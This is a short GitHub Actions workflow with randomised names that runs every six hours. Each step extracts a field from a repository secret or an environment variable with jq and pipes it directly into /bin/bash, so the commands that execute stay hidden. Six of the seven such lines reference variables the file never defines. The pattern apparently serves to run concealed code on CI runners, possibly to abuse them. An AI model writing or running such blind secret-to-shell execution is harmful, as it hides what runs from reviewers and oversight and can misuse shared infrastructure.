name: yanshanxi4376
on:
  workflow_dispatch:
  schedule:
    - cron: '27 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanshanxi4376
        env:
          hi7: ${{ secrets.hi7 }}
        run: |
          echo $hi7 | jq -r .dtakg34 | /bin/bash
          echo $yxwjf47 | jq -r .zyw144 | /bin/bash
          echo $cmyed13 | jq -r .gmym7 | /bin/bash
          echo $nur0 | jq -r .cqdm33 | /bin/bash
          echo $iunur463 | jq -r .odym93301 | /bin/bash
          echo $auql2 | jq -r .lov3 | /bin/bash
          echo $vj7900 | jq -r .ke670 | /bin/bash

